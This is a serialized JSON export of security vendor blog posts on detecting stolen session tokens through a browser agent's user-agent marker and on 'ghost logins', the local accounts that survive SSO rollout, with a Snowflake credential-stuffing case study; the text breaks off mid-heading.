",{"data":40106,"content":40108,"nodeType":940},{"uri":40107},"https:\u002F\u002Fredcanary.com\u002Fthreat-detection-report\u002Ftrends\u002Finfo-stealers\u002F",[40109],{"data":40110,"marks":40111,"value":40113,"nodeType":883},{},[40112],{"type":948},"2024 Red Canary Threat Detection Report",{"data":40115,"marks":40116,"value":21,"nodeType":883},{},[],{"data":40118,"content":40119,"nodeType":1535},{},[40120],{"data":40121,"content":40122,"nodeType":879},{},[40123,40127,40135],{"data":40124,"marks":40125,"value":40126,"nodeType":883},{},[],"Stolen credentials continued to rank as the top initial access method for breaches analyzed by Verizon. Source: ",{"data":40128,"content":40129,"nodeType":940},{"uri":1421},[40130],{"data":40131,"marks":40132,"value":40134,"nodeType":883},{},[40133],{"type":948},"2024 Data Breach Investigations Report",{"data":40136,"marks":40137,"value":21,"nodeType":883},{},[],{"data":40139,"content":40140,"nodeType":1535},{},[40141],{"data":40142,"content":40143,"nodeType":879},{},[40144,40148,40155],{"data":40145,"marks":40146,"value":40147,"nodeType":883},{},[],"The number of token replay attacks is increasing, with Microsoft detecting 147,000 attacks in 2023, a 111% increase year-over-year. Source: ",{"data":40149,"content":40150,"nodeType":940},{"uri":38290},[40151],{"data":40152,"marks":40153,"value":40154,"nodeType":883},{},[],"Microsoft Blog",{"data":40156,"marks":40157,"value":21,"nodeType":883},{},[],{"data":40159,"content":40160,"nodeType":909},{},[40161],{"data":40162,"marks":40163,"value":40164,"nodeType":883},{},[],"What's missing from current defenses",{"data":40166,"content":40167,"nodeType":879},{},[40168],{"data":40169,"marks":40170,"value":40171,"nodeType":883},{},[],"When defending against infostealer malware or other forms of session and credential theft, there are a few common challenges that organizations may face:",{"data":40173,"content":40174,"nodeType":1531},{},[40175,40185],{"data":40176,"content":40177,"nodeType":1535},{},[40178],{"data":40179,"content":40180,"nodeType":879},{},[40181],{"data":40182,"marks":40183,"value":40184,"nodeType":883},{},[],"Their endpoint security tooling doesn’t provide complete coverage across their device fleet, though they thought it did.",{"data":40186,"content":40187,"nodeType":1535},{},[40188],{"data":40189,"content":40190,"nodeType":879},{},[40191],{"data":40192,"marks":40193,"value":40194,"nodeType":883},{},[],"The malware is good enough to evade EDR detection, or it was able to execute and exfiltrate sessions or other data before it was stopped.",{"data":40196,"content":40197,"nodeType":879},{},[40198],{"data":40199,"marks":40200,"value":40201,"nodeType":883},{},[],"Existing approaches to detecting stolen sessions also pose a noisy problem. Relying on IP-based or geolocation-based signals can result in frequent false positives. (And not all identity provider logs include a session identifier that you can use to perform correlations in the first place.)",{"data":40203,"content":40204,"nodeType":879},{},[40205],{"data":40206,"marks":40207,"value":40208,"nodeType":883},{},[],"The missing piece is a trusted signal for legitimate sessions that you can use to correlate with other data in order to identify unexpected activity that indicates a compromised identity and device.",{"data":40210,"content":40211,"nodeType":909},{},[40212],{"data":40213,"marks":40214,"value":40215,"nodeType":883},{},[],"Generating unique telemetry via the browser",{"data":40217,"content":40218,"nodeType":879},{},[40219],{"data":40220,"marks":40221,"value":40222,"nodeType":883},{},[],"Push’s solution to detecting stolen sessions falls into the category of “so simple, why didn’t this already exist?”",{"data":40224,"content":40225,"nodeType":879},{},[40226],{"data":40227,"marks":40228,"value":40229,"nodeType":883},{},[],"The answer: Because you need to be in the browser to do it. The Push browser agent sits in a unique position that we can leverage to provide telemetry that otherwise would be extremely difficult to create.",{"data":40231,"content":40232,"nodeType":879},{},[40233],{"data":40234,"marks":40235,"value":36327,"nodeType":883},{},[],{"data":40237,"content":40238,"nodeType":1531},{},[40239,40249,40259],{"data":40240,"content":40241,"nodeType":1535},{},[40242],{"data":40243,"content":40244,"nodeType":879},{},[40245],{"data":40246,"marks":40247,"value":40248,"nodeType":883},{},[],"Via the Push browser agent, Push injects a unique marker into the user agent string of sessions that occur in browsers enrolled in Push.",{"data":40250,"content":40251,"nodeType":1535},{},[40252],{"data":40253,"content":40254,"nodeType":879},{},[40255],{"data":40256,"marks":40257,"value":40258,"nodeType":883},{},[],"Administrators then add the list of domains where they wish to inject the marker into sessions, such as an identity provider like Okta or Microsoft.",{"data":40260,"content":40261,"nodeType":1535},{},[40262],{"data":40263,"content":40264,"nodeType":879},{},[40265,40269,40273,40277,40282],{"data":40266,"marks":40267,"value":40268,"nodeType":883},{},[],"By analyzing logs from the IdP, you can identify activity from the same session that both ",{"data":40270,"marks":40271,"value":34677,"nodeType":883},{},[40272],{"type":891},{"data":40274,"marks":40275,"value":40276,"nodeType":883},{},[]," the Push marker and that ",{"data":40278,"marks":40279,"value":40281,"nodeType":883},{},[40280],{"type":891},"lacks",{"data":40283,"marks":40284,"value":40285,"nodeType":883},{},[]," the marker. This can only ever happen when a session is extracted from a browser and maliciously imported into a different browser.",{"data":40287,"content":40288,"nodeType":879},{},[40289],{"data":40290,"marks":40291,"value":40292,"nodeType":883},{},[],"This is a high-fidelity signal that a stolen session token is in use.",{"data":40294,"content":40298,"nodeType":971},{"target":40295},{"sys":40296},{"id":40297,"type":976,"linkType":977},"3zQamWSaZFIbMUhQZtM2II",[],{"data":40300,"content":40301,"nodeType":879},{},[40302,40306,40314],{"data":40303,"marks":40304,"value":40305,"nodeType":883},{},[],"Learn more about configuring this feature in our ",{"data":40307,"content":40308,"nodeType":940},{"uri":39973},[40309],{"data":40310,"marks":40311,"value":40313,"nodeType":883},{},[40312],{"type":948},"Help Center",{"data":40315,"marks":40316,"value":1350,"nodeType":883},{},[],{"data":40318,"content":40322,"nodeType":971},{"target":40319},{"sys":40320},{"id":40321,"type":976,"linkType":977},"35dpGqNY6cTM0fSQRflLiO",[],{"data":40324,"content":40325,"nodeType":909},{},[40326],{"data":40327,"marks":40328,"value":40329,"nodeType":883},{},[],"Unlocking new capabilities for blue teams",{"data":40331,"content":40332,"nodeType":879},{},[40333],{"data":40334,"marks":40335,"value":40336,"nodeType":883},{},[],"As we’ve said before, we see browser telemetry and browser-based controls as the missing piece in security strategies to stop identity attacks — particularly for modern organizations with complex identity ecosystems that span IdPs, SaaS apps, OAuth-connected apps, and more.",{"data":40338,"content":40339,"nodeType":879},{},[40340],{"data":40341,"marks":40342,"value":40343,"nodeType":883},{},[],"Where the browser agent approach particularly shines is that it’s application-agnostic. ",{"data":40345,"content":40346,"nodeType":879},{},[40347],{"data":40348,"marks":40349,"value":40350,"nodeType":883},{},[],"As long as the app you want to monitor provides robust logs, you can inject the Push-supplied marker into any session on any app. ",{"data":40352,"content":40353,"nodeType":879},{},[40354],{"data":40355,"marks":40356,"value":40357,"nodeType":883},{},[],"This allows you to detect suspicious activity even on internal corporate assets, such as an intranet. ",{"data":40359,"content":40360,"nodeType":879},{},[40361],{"data":40362,"marks":40363,"value":40364,"nodeType":883},{},[],"A tidy side effect is that you can also use this feature to identify unmanaged devices accessing sensitive corporate internal resources because they will lack the Push browser agent-supplied marker.",{"data":40366,"content":40367,"nodeType":879},{},[40368],{"data":40369,"marks":40370,"value":40371,"nodeType":883},{},[],"There are probably a few other creative use cases for this feature, so we look forward to seeing what you come up with!",{"data":40373,"content":40374,"nodeType":909},{},[40375],{"data":40376,"marks":40377,"value":35598,"nodeType":883},{},[],{"data":40379,"content":40380,"nodeType":879},{},[40381,40385,40392],{"data":40382,"marks":40383,"value":40384,"nodeType":883},{},[],"To see Push in action, ",{"data":40386,"content":40387,"nodeType":940},{"uri":3254},[40388],{"data":40389,"marks":40390,"value":7109,"nodeType":883},{},[40391],{"type":948},{"data":40393,"marks":40394,"value":40395,"nodeType":883},{},[],". We’ll be happy to show you this feature, along with how we discover all the apps your employees are using, even the ones not behind SSO, and how we detect vulnerable identities and stop identity attacks with browser-based controls.","Introducing session token theft detection: Why browser is best","Push's browser agent identifies session token theft by adding telemetry to the user agent string to create a new high-fidelity signal for your security team.","2024-06-25T00:00:00.000Z","introducing-session-token-theft-detection-why-browser-is-best",{"items":40401},[40402,40404],{"sys":40403,"name":343},{"id":3276},{"sys":40405,"name":28298},{"id":28297},{"items":40407},[40408],{"fullName":4797,"firstName":4798,"jobTitle":4799,"profilePicture":40409},{"url":4801},{"__typename":1967,"sys":40411,"content":40413,"title":41232,"synopsis":41233,"hashTags":59,"publishedDate":41234,"slug":41235,"tagsCollection":41236,"authorsCollection":41242},{"id":40412},"174u87EYeKMKHzYYxBLlHO",{"json":40414},{"data":40415,"content":40416,"nodeType":875},{},[40417,40424,40431,40438,40468,40475,40482,40499,40506,40513,40531,40538,40545,40552,40558,40565,40608,40615,40622,40629,40652,40659,40666,40673,40721,40728,40735,40742,40749,40761,40768,40776,40783,40816,40823,40830,40837,40844,40906,40914,40921,40928,40962,40969,40977,40984,40991,41003,41019,41049,41067,41074,41091,41098,41105,41123,41130,41137,41144,41177,41184,41202,41220,41226],{"data":40418,"content":40419,"nodeType":879},{},[40420],{"data":40421,"marks":40422,"value":40423,"nodeType":883},{},[],"Identity attacks like phishing, credential stuffing, and session hijacking are now the leading cause of cyber security breaches, as attackers shift their attention to the sprawl of third-party applications and services that has become the backbone of business IT. ",{"data":40425,"content":40426,"nodeType":879},{},[40427],{"data":40428,"marks":40429,"value":40430,"nodeType":883},{},[],"The attacker’s goal in these attacks is account takeover: logging into a user account to access your company app tenant. From there, the attacker can usually achieve all of their objectives from inside the compromised app, usually involving dumping sensitive data with which to hold the company to ransom, or selling the data on underground criminal marketplaces. ",{"data":40432,"content":40433,"nodeType":879},{},[40434],{"data":40435,"marks":40436,"value":40437,"nodeType":883},{},[],"These attack techniques have been commonplace for over a decade — but the shift in attack context away from attacking endpoints (user devices and servers) to cloud services is seeing something of an identity attack renaissance. ",{"data":40439,"content":40440,"nodeType":879},{},[40441,40444,40451,40455,40464],{"data":40442,"marks":40443,"value":21,"nodeType":883},{},[],{"data":40445,"content":40446,"nodeType":940},{"uri":37234},[40447],{"data":40448,"marks":40449,"value":397,"nodeType":883},{},[40450],{"type":948},{"data":40452,"marks":40453,"value":40454,"nodeType":883},{},[]," are one of the leading factors in successful ",{"data":40456,"content":40458,"nodeType":940},{"uri":40457},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fcredential_stuffing\u002Fdescription.md",[40459],{"data":40460,"marks":40461,"value":40463,"nodeType":883},{},[40462],{"type":948},"credential stuffing",{"data":40465,"marks":40466,"value":40467,"nodeType":883},{},[]," attacks driving account takeover.",{"data":40469,"content":40470,"nodeType":909},{},[40471],{"data":40472,"marks":40473,"value":40474,"nodeType":883},{},[],"Ghost logins 101",{"data":40476,"content":40477,"nodeType":879},{},[40478],{"data":40479,"marks":40480,"value":40481,"nodeType":883},{},[],"Simply put, ghost logins are often-forgotten alternative login methods that are tricky for security teams to manage and secure — because they don’t know about them. Because of this, they’re likely to possess weak configurations that make them susceptible to account takeover attacks. ",{"data":40483,"content":40484,"nodeType":879},{},[40485,40489,40496],{"data":40486,"marks":40487,"value":40488,"nodeType":883},{},[],"We found that ",{"data":40490,"content":40491,"nodeType":940},{"uri":1589},[40492],{"data":40493,"marks":40494,"value":40495,"nodeType":883},{},[],"ghost logins are present in ~10% of the accounts per organization",{"data":40497,"marks":40498,"value":6141,"nodeType":883},{},[],{"data":40500,"content":40501,"nodeType":1036},{},[40502],{"data":40503,"marks":40504,"value":40505,"nodeType":883},{},[],"Why do ghost logins exist?",{"data":40507,"content":40508,"nodeType":879},{},[40509],{"data":40510,"marks":40511,"value":40512,"nodeType":883},{},[],"Identity management used to be something that was centrally contained and managed using an enterprise identity service like Active Directory. Most users probably only had one or two identities that you really cared about: the one they used to log into their company laptop and domain, and maybe also to log into a VPN. ",{"data":40514,"content":40515,"nodeType":879},{},[40516,40520,40527],{"data":40517,"marks":40518,"value":40519,"nodeType":883},{},[],"Now, there are ",{"data":40521,"content":40522,"nodeType":940},{"uri":1589},[40523],{"data":40524,"marks":40525,"value":40526,"nodeType":883},{},[],"200+ business apps in use per company, creating 1000s of sprawled identities",{"data":40528,"marks":40529,"value":40530,"nodeType":883},{},[]," across an ecosystem of business apps and services accessed over the internet.",{"data":40532,"content":40533,"nodeType":879},{},[40534],{"data":40535,"marks":40536,"value":40537,"nodeType":883},{},[],"Most businesses have tried to solve this problem with single sign on (SSO). The logic being that if you can use a single set of credentials (and therefore, a single identity) to access all of your business apps, and then secure those credentials with MFA, then this problem goes away. However…",{"data":40539,"content":40540,"nodeType":1036},{},[40541],{"data":40542,"marks":40543,"value":40544,"nodeType":883},{},[],"SSO expectations versus reality",{"data":40546,"content":40547,"nodeType":879},{},[40548],{"data":40549,"marks":40550,"value":40551,"nodeType":883},{},[],"Unfortunately, the reality of SSO implementation is flawed. Most apps accept multiple login methods that can be configured — and used — simultaneously (yes, most apps don’t have proper session controls).  ",{"data":40553,"content":40557,"nodeType":971},{"target":40554},{"sys":40555},{"id":40556,"type":976,"linkType":977},"3sOz3HkiyJpY9nFtGCWEOV",[],{"data":40559,"content":40560,"nodeType":879},{},[40561],{"data":40562,"marks":40563,"value":40564,"nodeType":883},{},[],"This is made worse by the fact that:",{"data":40566,"content":40567,"nodeType":1531},{},[40568,40578,40588,40598],{"data":40569,"content":40570,"nodeType":1535},{},[40571],{"data":40572,"content":40573,"nodeType":879},{},[40574],{"data":40575,"marks":40576,"value":40577,"nodeType":883},{},[],"Most apps can't be locked down to restrict which login methods are accepted.",{"data":40579,"content":40580,"nodeType":1535},{},[40581],{"data":40582,"content":40583,"nodeType":879},{},[40584],{"data":40585,"marks":40586,"value":40587,"nodeType":883},{},[],"Users often self-adopt apps, and default to a username and password (and typically miss out MFA). ",{"data":40589,"content":40590,"nodeType":1535},{},[40591],{"data":40592,"content":40593,"nodeType":879},{},[40594],{"data":40595,"marks":40596,"value":40597,"nodeType":883},{},[],"SSO isn’t always possible if you aren’t using a supported IdP — and only one in three apps support SAML, the preferred enterprise-grade protocol.",{"data":40599,"content":40600,"nodeType":1535},{},[40601],{"data":40602,"content":40603,"nodeType":879},{},[40604],{"data":40605,"marks":40606,"value":40607,"nodeType":883},{},[],"Even where SSO is possible, configuring an app for SSO doesn't automatically delete any legacy local logins.",{"data":40609,"content":40610,"nodeType":879},{},[40611],{"data":40612,"marks":40613,"value":40614,"nodeType":883},{},[],"Inevitably, this means that there are many situations in which users will create local accounts — typically with a username and password, and without MFA. This is how ghost logins are born.",{"data":40616,"content":40617,"nodeType":1036},{},[40618],{"data":40619,"marks":40620,"value":40621,"nodeType":883},{},[],"How are ghost logins created? ",{"data":40623,"content":40624,"nodeType":879},{},[40625],{"data":40626,"marks":40627,"value":40628,"nodeType":883},{},[],"Ghost logins can be created in the following ways:",{"data":40630,"content":40631,"nodeType":1531},{},[40632,40642],{"data":40633,"content":40634,"nodeType":1535},{},[40635],{"data":40636,"content":40637,"nodeType":879},{},[40638],{"data":40639,"marks":40640,"value":40641,"nodeType":883},{},[],"A user self-adopts an app, setting up an account with a local username and password. The app is later adopted companywide and brought under SSO. This creates an additional SSO login method, likely as the default, but the local login will continue to exist unless explicitly disabled or deleted. ",{"data":40643,"content":40644,"nodeType":1535},{},[40645],{"data":40646,"content":40647,"nodeType":879},{},[40648],{"data":40649,"marks":40650,"value":40651,"nodeType":883},{},[],"Secondary\u002Fbackup login methods can often be added later in the app settings after logging in. This includes things like setting up a secondary email to send a login link to, or setting up API access to remove the need to authenticate altogether. ",{"data":40653,"content":40654,"nodeType":879},{},[40655],{"data":40656,"marks":40657,"value":40658,"nodeType":883},{},[],"So, ghost logins are very easily introduced through the normal course of app adoption and use by employees. ",{"data":40660,"content":40661,"nodeType":1036},{},[40662],{"data":40663,"marks":40664,"value":40665,"nodeType":883},{},[],"Why do ghost logins pose a risk? ",{"data":40667,"content":40668,"nodeType":879},{},[40669],{"data":40670,"marks":40671,"value":40672,"nodeType":883},{},[],"Ghost logins pose a risk for a number of reasons, as they: ",{"data":40674,"content":40675,"nodeType":1531},{},[40676,40691,40706],{"data":40677,"content":40678,"nodeType":1535},{},[40679],{"data":40680,"content":40681,"nodeType":879},{},[40682,40687],{"data":40683,"marks":40684,"value":40686,"nodeType":883},{},[40685],{"type":916},"Typically have less secure configurations ",{"data":40688,"marks":40689,"value":40690,"nodeType":883},{},[],"than your preferred login method – and may be missing key controls like MFA.  ",{"data":40692,"content":40693,"nodeType":1535},{},[40694],{"data":40695,"content":40696,"nodeType":879},{},[40697,40702],{"data":40698,"marks":40699,"value":40701,"nodeType":883},{},[40700],{"type":916},"Are effectively shadow logins",{"data":40703,"marks":40704,"value":40705,"nodeType":883},{},[]," – IT\u002Fsecurity don’t know about them, and if using an IdP as your primary identity security interface, they won’t necessarily be visible without taking a deeper look at individual apps. ",{"data":40707,"content":40708,"nodeType":1535},{},[40709],{"data":40710,"content":40711,"nodeType":879},{},[40712,40717],{"data":40713,"marks":40714,"value":40716,"nodeType":883},{},[40715],{"type":916},"Can be used simultaneously with SSO",{"data":40718,"marks":40719,"value":40720,"nodeType":883},{},[]," – so you can have an unrestricted number of concurrent sessions with SSO and non SSO logins active at the same time, without the user being kicked out of the previous session.",{"data":40722,"content":40723,"nodeType":879},{},[40724],{"data":40725,"marks":40726,"value":40727,"nodeType":883},{},[],"Ghost logins provide opportunities for attackers to bypass security controls for initial access and persistence in an application (which we’ll come onto in more detail later). They also provide an opportunity for malicious insiders, e.g. a disgruntled employee, to access systems even after SSO access is revoked. If the security team relies on IdP logs to audit app logins, these accounts can go undetected.",{"data":40729,"content":40730,"nodeType":879},{},[40731],{"data":40732,"marks":40733,"value":40734,"nodeType":883},{},[],"To be able to identify them, you’d need to log into the app admin dashboard. But depending on how the app was adopted, you (as a security admin) may not even be an app-level admin — it’s not unusual for individual teams to administer their own apps. And even if you do have access, it’s not always easy (or possible) to gather this level of information about user account configuration. ",{"data":40736,"content":40737,"nodeType":879},{},[40738],{"data":40739,"marks":40740,"value":40741,"nodeType":883},{},[],"It’s very easy to see how these vulnerable login methods can be overlooked by security teams – let’s look at how they can be identified and exploited by attackers. ",{"data":40743,"content":40744,"nodeType":909},{},[40745],{"data":40746,"marks":40747,"value":40748,"nodeType":883},{},[],"How can ghost logins be exploited by attackers?",{"data":40750,"content":40751,"nodeType":879},{},[40752,40757],{"data":40753,"marks":40754,"value":40756,"nodeType":883},{},[40755],{"type":916},"Let’s take an example scenario:",{"data":40758,"marks":40759,"value":40760,"nodeType":883},{},[]," You’re using an IdP solution like Okta or Microsoft\u002FEntra with SAML SSO as the default login method for your core business apps. Via your IdP you require MFA when authenticating to your IdP apps page, and also potentially when signing into an individual connected app. ",{"data":40762,"content":40763,"nodeType":879},{},[40764],{"data":40765,"marks":40766,"value":40767,"nodeType":883},{},[],"However, you only recently introduced your IdP solution, and your users previously accessed this app with a local username and password. Although you asked your users to configure MFA in the app itself, not all of them did. And when you deployed your IdP solution, you didn’t manually unset all the local password-based logins for the apps you connected to it. ",{"data":40769,"content":40770,"nodeType":879},{},[40771],{"data":40772,"marks":40773,"value":40775,"nodeType":883},{},[40774],{"type":916},"Unknown to you, there are now hundreds of local accounts for core business apps which lack MFA. ",{"data":40777,"content":40778,"nodeType":879},{},[40779],{"data":40780,"marks":40781,"value":40782,"nodeType":883},{},[],"There are two main scenarios in which ghost logins can be utilized by an attacker:",{"data":40784,"content":40785,"nodeType":1531},{},[40786,40801],{"data":40787,"content":40788,"nodeType":1535},{},[40789],{"data":40790,"content":40791,"nodeType":879},{},[40792,40797],{"data":40793,"marks":40794,"value":40796,"nodeType":883},{},[40795],{"type":916},"To bypass robustly configured login methods",{"data":40798,"marks":40799,"value":40800,"nodeType":883},{},[]," such as SSO to compromise an app identity during the initial access phase of an attack. ",{"data":40802,"content":40803,"nodeType":1535},{},[40804],{"data":40805,"content":40806,"nodeType":879},{},[40807,40812],{"data":40808,"marks":40809,"value":40811,"nodeType":883},{},[40810],{"type":916},"To create additional login methods for an already compromised account to ensure persistent access",{"data":40813,"marks":40814,"value":40815,"nodeType":883},{},[]," – even if the original compromised login method is revoked or disabled. This could be either the result of compromising an identity belonging to a specific app, or having previously compromised an IdP account (e.g. Okta).",{"data":40817,"content":40818,"nodeType":879},{},[40819],{"data":40820,"marks":40821,"value":40822,"nodeType":883},{},[],"Let's look at these use cases in more detail. ",{"data":40824,"content":40825,"nodeType":1036},{},[40826],{"data":40827,"marks":40828,"value":40829,"nodeType":883},{},[],"Ghost logins for initial access",{"data":40831,"content":40832,"nodeType":879},{},[40833],{"data":40834,"marks":40835,"value":40836,"nodeType":883},{},[],"Arguably the most dangerous use case for ghost logins is to conduct credential attacks against accounts using a username and password. Logins with a weak or guessable password, or a reused password that has appeared in a public data breach dump, are primed for account takeover. ",{"data":40838,"content":40839,"nodeType":879},{},[40840],{"data":40841,"marks":40842,"value":40843,"nodeType":883},{},[],"The cyber crime ecosystem is leaning toward the theft, sale, and use of stolen credentials (not just emails and passwords, but session tokens too). ",{"data":40845,"content":40846,"nodeType":1531},{},[40847,40868,40887],{"data":40848,"content":40849,"nodeType":1535},{},[40850],{"data":40851,"content":40852,"nodeType":879},{},[40853,40857,40865],{"data":40854,"marks":40855,"value":40856,"nodeType":883},{},[],"There are 600 million identity attacks per day, with 99% involving passwords (",{"data":40858,"content":40860,"nodeType":940},{"uri":40859},"https:\u002F\u002Fcdn-dynmedia-1.microsoft.com\u002Fis\u002Fcontent\u002Fmicrosoftcorp\u002Fmicrosoft\u002Ffinal\u002Fen-us\u002Fmicrosoft-brand\u002Fdocuments\u002FMicrosoft%20Digital%20Defense%20Report%202024%20%281%29.pdf",[40861],{"data":40862,"marks":40863,"value":13539,"nodeType":883},{},[40864],{"type":948},{"data":40866,"marks":40867,"value":34611,"nodeType":883},{},[],{"data":40869,"content":40870,"nodeType":1535},{},[40871],{"data":40872,"content":40873,"nodeType":879},{},[40874,40877,40884],{"data":40875,"marks":40876,"value":38308,"nodeType":883},{},[],{"data":40878,"content":40879,"nodeType":940},{"uri":38311},[40880],{"data":40881,"marks":40882,"value":38317,"nodeType":883},{},[40883],{"type":948},{"data":40885,"marks":40886,"value":34611,"nodeType":883},{},[],{"data":40888,"content":40889,"nodeType":1535},{},[40890],{"data":40891,"content":40892,"nodeType":879},{},[40893,40896,40903],{"data":40894,"marks":40895,"value":38243,"nodeType":883},{},[],{"data":40897,"content":40898,"nodeType":940},{"uri":38246},[40899],{"data":40900,"marks":40901,"value":38252,"nodeType":883},{},[40902],{"type":948},{"data":40904,"marks":40905,"value":34611,"nodeType":883},{},[],{"data":40907,"content":40908,"nodeType":879},{},[40909],{"data":40910,"marks":40911,"value":40913,"nodeType":883},{},[40912],{"type":916},"So, it’s easier than ever for attackers to gather breached credentials and weaponize them at scale. ",{"data":40915,"content":40916,"nodeType":879},{},[40917],{"data":40918,"marks":40919,"value":40920,"nodeType":883},{},[],"Realistically, any username and password combination for addresses belonging to a specific organization\u002Fdomain can be attempted on any app. Breached credential data will often provide a strong indicator of other apps also in use for that organization. And for apps with a custom tenant URL (that cannot be easily guessed) data dumps often helpfully include the URLs for those login pages, too.  ",{"data":40922,"content":40923,"nodeType":879},{},[40924],{"data":40925,"marks":40926,"value":40927,"nodeType":883},{},[],"The risk posed by the massive amounts of leaked credentials available is heightened because: ",{"data":40929,"content":40930,"nodeType":1531},{},[40931,40952],{"data":40932,"content":40933,"nodeType":1535},{},[40934],{"data":40935,"content":40936,"nodeType":879},{},[40937,40941,40948],{"data":40938,"marks":40939,"value":40940,"nodeType":883},{},[],"Many employees reuse passwords, with ",{"data":40942,"content":40943,"nodeType":940},{"uri":1589},[40944],{"data":40945,"marks":40946,"value":40947,"nodeType":883},{},[],"~9% of all accounts using a breached, weak, or reused password",{"data":40949,"marks":40950,"value":40951,"nodeType":883},{},[],". This isn’t just for low-risk apps either, and includes the reuse of highly sensitive IdP creds. ",{"data":40953,"content":40954,"nodeType":1535},{},[40955],{"data":40956,"content":40957,"nodeType":879},{},[40958],{"data":40959,"marks":40960,"value":40961,"nodeType":883},{},[],"Organizations don’t typically rotate or enforce changes to SaaS app passwords in the same way they might for company account\u002Fdevice login connected to Active Directory.  ",{"data":40963,"content":40964,"nodeType":879},{},[40965],{"data":40966,"marks":40967,"value":40968,"nodeType":883},{},[],"Ghost logins aren’t limited to just username and password either. For example, a breached social account such as Facebook or Google can result in a broader compromise if those accounts have been connected to any corporate apps.   ",{"data":40970,"content":40971,"nodeType":879},{},[40972],{"data":40973,"marks":40974,"value":40976,"nodeType":883},{},[40975],{"type":916},"So, exploiting ghost logins can be a highly effective method for attackers to gain initial access to a user account from which to launch further attacks.  ",{"data":40978,"content":40979,"nodeType":1036},{},[40980],{"data":40981,"marks":40982,"value":40983,"nodeType":883},{},[],"Ghost logins for persistence and defense evasion",{"data":40985,"content":40986,"nodeType":879},{},[40987],{"data":40988,"marks":40989,"value":40990,"nodeType":883},{},[],"Now, we’ll take a look at how attackers can leverage ghost logins as part of the later stages of an attack, having already established an initial foothold via account compromise. ",{"data":40992,"content":40993,"nodeType":879},{},[40994,40998],{"data":40995,"marks":40996,"value":40997,"nodeType":883},{},[],"If an organization has a reasonable level of security monitoring in-place (depending on log availability from the particular app vendor), or a victim receives a notification about an unusual login (e.g. from a new device or unusual IP) then access to an account can be short-lived. ",{"data":40999,"marks":41000,"value":41002,"nodeType":883},{},[41001],{"type":916},"However, ghost logins can provide attackers with the tools to maintain persistent access to a compromised account, even if the initial compromised login method is disabled or revoked. ",{"data":41004,"content":41005,"nodeType":879},{},[41006,41010,41015],{"data":41007,"marks":41008,"value":41009,"nodeType":883},{},[],"For example, if a social login is used to access an account, an adversary may be able to configure a separate username\u002Fpassword login, or even (though much less commonly) connect a second social account that the adversary controls. This allows the adversary to maintain persistent access to the user account ",{"data":41011,"marks":41012,"value":41014,"nodeType":883},{},[41013],{"type":916},"even in the event of password changes or MFA changes",{"data":41016,"marks":41017,"value":41018,"nodeType":883},{},[],". The attack will go unnoticed if the victim organization relies on SSO logs for auditing access to SaaS applications because the attack bypasses SSO, as the login remains local to the SaaS app or, in the case of an OIDC SSO login, the adversary’s own social account.",{"data":41020,"content":41021,"nodeType":879},{},[41022,41026,41033,41037,41046],{"data":41023,"marks":41024,"value":41025,"nodeType":883},{},[],"Another quirk is that it’s common for ordinary users to become app-level admins when an app is self-adopted by an individual or team. If an attacker is able to gain control of such an account, it can then be used to target other users without needing to deliver phishing links by hijacking SAML-based authentication. In this scenario, users attempting to sign in using SAML SSO are directed it to an attacker-controlled tenant in a watering hole attack (also known as ",{"data":41027,"content":41028,"nodeType":940},{"uri":32601},[41029],{"data":41030,"marks":41031,"value":32607,"nodeType":883},{},[41032],{"type":948},{"data":41034,"marks":41035,"value":41036,"nodeType":883},{},[],", which you can ",{"data":41038,"content":41040,"nodeType":940},{"uri":41039},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fsamljacking-a-poisoned-tenant\u002F",[41041],{"data":41042,"marks":41043,"value":41045,"nodeType":883},{},[41044],{"type":948},"read more about in another blog post",{"data":41047,"marks":41048,"value":1087,"nodeType":883},{},[],{"data":41050,"content":41051,"nodeType":879},{},[41052,41056,41064],{"data":41053,"marks":41054,"value":41055,"nodeType":883},{},[],"If you're curious as to how an attacker might be able to compromise an IdP account such as Okta, ",{"data":41057,"content":41058,"nodeType":940},{"uri":38998},[41059],{"data":41060,"marks":41061,"value":41063,"nodeType":883},{},[41062],{"type":948},"you should check out our blog post on AitM and BitM phishing techniques",{"data":41065,"marks":41066,"value":34940,"nodeType":883},{},[],{"data":41068,"content":41069,"nodeType":909},{},[41070],{"data":41071,"marks":41072,"value":41073,"nodeType":883},{},[],"Case study: Snowflake",{"data":41075,"content":41076,"nodeType":879},{},[41077,41080,41087],{"data":41078,"marks":41079,"value":3786,"nodeType":883},{},[],{"data":41081,"content":41082,"nodeType":940},{"uri":7680},[41083],{"data":41084,"marks":41085,"value":41086,"nodeType":883},{},[],"recent attacks on 165 Snowflake customers",{"data":41088,"marks":41089,"value":41090,"nodeType":883},{},[],", resulting in hundreds of millions of breached customer records, were the product of a credential stuffing campaign using stolen credentials from infostealer infections dating back to 2020. ",{"data":41092,"content":41093,"nodeType":879},{},[41094],{"data":41095,"marks":41096,"value":41097,"nodeType":883},{},[],"The industry response to Snowflake was typical: check whether Snowflake has been set up for SSO, and if so, job done — we’re protected by MFA.",{"data":41099,"content":41100,"nodeType":879},{},[41101],{"data":41102,"marks":41103,"value":41104,"nodeType":883},{},[],"The reality was that MFA was not — and could not — be centrally enforced for username and password accounts. Even if MFA was applied at the IdP level for SSO logins, it was not enforced for local username and password logins. It needed to be opted-into by the user. ",{"data":41106,"content":41107,"nodeType":879},{},[41108,41112,41120],{"data":41109,"marks":41110,"value":41111,"nodeType":883},{},[],"This meant the most logical thing to do was to disable local accounts. But because Snowflake is essentially a cloud-hosted SQL database, there was no easy-to-use GUI to access local account config data. Once you’d managed to get an admin account with the right permissions, you needed to run various commands to find and unset the accounts. ",{"data":41113,"content":41115,"nodeType":940},{"uri":41114},"https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fvideo\u002Fdemonstrating-ghost-logins-in-snowflake-and-how-to-remediate-them\u002F",[41116],{"data":41117,"marks":41118,"value":41119,"nodeType":883},{},[],"But if you didn’t have the exact type of admin account, misleading results would be returned — and even after you had fixed the vulnerability it took hours to update the database. ",{"data":41121,"marks":41122,"value":21,"nodeType":883},{},[],{"data":41124,"content":41125,"nodeType":879},{},[41126],{"data":41127,"marks":41128,"value":41129,"nodeType":883},{},[],"This meant that organizations were exposed to these attacks for a prolonged period, and were left uncertain as to whether they had addressed the vulnerabilities or not. ",{"data":41131,"content":41132,"nodeType":909},{},[41133],{"data":41134,"marks":41135,"value":41136,"nodeType":883},{},[],"Using Push to find and fix ghost logins across your app 